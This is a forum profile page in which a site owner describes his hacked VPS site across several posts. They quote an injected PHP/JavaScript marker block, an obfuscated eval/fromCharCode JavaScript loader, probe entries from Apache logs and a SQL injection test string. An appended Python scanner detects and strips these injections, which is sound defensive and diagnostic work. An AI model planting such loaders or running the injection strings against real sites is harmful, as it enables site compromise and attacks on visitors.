
tommyboy123x

Members
  • Posts

    106
  • Joined

  • Last visited

About tommyboy123x

  • Birthday 03/04/1981

Contact Methods

  • AIM
    keepitguilleaume
  • Website URL
    http://www.dollarhauler.com/

Profile Information

  • Gender
    Male
  • Location
    Scottsdale, AZ

tommyboy123x's Achievements

Member

Member (2/5)

0

Reputation

  1. Damn, thank you so much dark.... I didn't realize how out of touch I was. I also wanted to give an update here - the attacker has attempted two other times to add some obfuscated javascript code in the js files... this is becoming a serious problem.

     try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="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";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

     How are you testing these injections? Are you convinced this is the cause of these attacks? When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect. I'll be back in a few days with the changes.
  2. Could you elaborate? As far as I'm aware, there is no way to add an SQL injection on this form... it does pass the data without mysql_real_escape_string, but it also converts it into an md5 hash before adding it to an SQL line. I also believe this may have been possible because of my lax permission set. A lot of these files were 775 by default, and I think 640 is really what I want. Could this have been the cause? I still can't find the PHP logs; can anyone tell me where to find clues that can help me piece together what happened? It is a Debian Squeeze environment.
  3. It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings). I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time. It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start. I believe the attacker may have used this to gain write permissions. I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this. Anyways, login.php should be fixed for this particular exploit. I'll keep this tab open and post in a couple weeks when I do a complete analysis.
  4. Thanks for the help - I thought login.php used mysql_real_escape_string. A few years back I went through pretty carefully looking for XSS possibilities and other things like that; this must have been updated since then. I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possibilities. Thanks!
  5. I have this in my apache logs:

     [Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat

     as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config). In the access log I have this:

     96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"
     96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$
     77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$

     Still trying to track down my php error logs based on my php.ini files, I'll edit if found, but is any of this suspicious to you?
  6. I'm not sure this is the right place to post this, but here it goes... There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file. The PHP is as follows:

     <? #0f2490# echo('<img src=\"http://localhost/\" >'); #/0f2490# ?>

     and on all my javascript files:

     /*0f2490*/ document.write('<img src="http://localhost/" >'); /*0f2490*/

     The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581

     Was my server compromised? What steps can I take to ensure this doesn't happen again? It's on a VPS I manage, so I wouldn't be too surprised if I ****ed something up; let me know what (if any) access logs you think may be relevant or even where to begin with this problem. Thanks!
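A defender-side check for the injected blocks quoted in posts 1 and 6, added here as an example and not code from the original thread or its author: it walks a web root for the `#0f2490#` / `/*0f2490*/` marker blocks and for the split-string `eval` loader pattern, and can strip the marker blocks from a file's contents. The sample web root it builds is constructed for the dry run, not the poster's site; the regexes and the indicator names are assumptions of this example.

```python
import re
import tempfile
from pathlib import Path

# Markers from the injected PHP and JavaScript quoted in post 6.
PHP_BLOCK = re.compile(r"<\?\s*#0f2490#.*?#/0f2490#\s*\?>", re.DOTALL)
JS_BLOCK = re.compile(r"/\*0f2490\*/.*?/\*0f2490\*/", re.DOTALL)
# Heuristic for the loader in post 1: eval() plus split-string spelling of
# "String" / "fromCharCode" (a trick meant to defeat naive grep checks).
EVAL_CALL = re.compile(r"\beval\s*\(")
SPLIT_NAME = re.compile(r'"(?:St|fr)"\s*\+\s*"(?:ring|omCharCode)"')

def scan_file(path: Path) -> list:
    """Return indicator names found in one file (empty list when clean)."""
    text = path.read_text(errors="replace")
    found = []
    if PHP_BLOCK.search(text):
        found.append("php-marker-block")
    if JS_BLOCK.search(text):
        found.append("js-marker-block")
    if EVAL_CALL.search(text) and SPLIT_NAME.search(text):
        found.append("split-string-eval")
    return found

def scan_tree(root: Path) -> dict:
    # Map each flagged .php/.js file (path relative to root) to its indicators.
    hits = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix in (".php", ".js"):
            found = scan_file(p)
            if found:
                hits[p.relative_to(root).as_posix()] = found
    return hits

def strip_marker_blocks(text: str) -> tuple:
    # Remove the marker-delimited blocks; return (cleaned text, blocks removed).
    text, n_php = PHP_BLOCK.subn("", text)
    text, n_js = JS_BLOCK.subn("", text)
    return text, n_php + n_js

def build_sample_tree() -> Path:
    """Constructed sample web root (not real site files) for a dry run."""
    root = Path(tempfile.mkdtemp())
    (root / "js").mkdir()
    (root / "index.php").write_text("<?php echo 'hi'; ?>\n"
        + r"<? #0f2490# echo('<img src=\"http://localhost/\" >'); #/0f2490# ?>" + "\n")
    (root / "js" / "app.js").write_text(
        "/*0f2490*/ document.write('<img src=\"http://localhost/\" >'); /*0f2490*/\n"
        "function f() {}\n")
    (root / "js" / "loader.js").write_text('ss=eval("St"+"ring");eval(ss["fr"+"omCharCode"].apply(ss,[]));\n')
    (root / "clean.php").write_text("<?php echo 'clean'; ?>\n")
    return root
```

Run `scan_tree(Path("/var/www"))` against a copy of the web root taken for analysis; a file-integrity baseline (checksums of the known-good tree) catches re-injections that use a different marker.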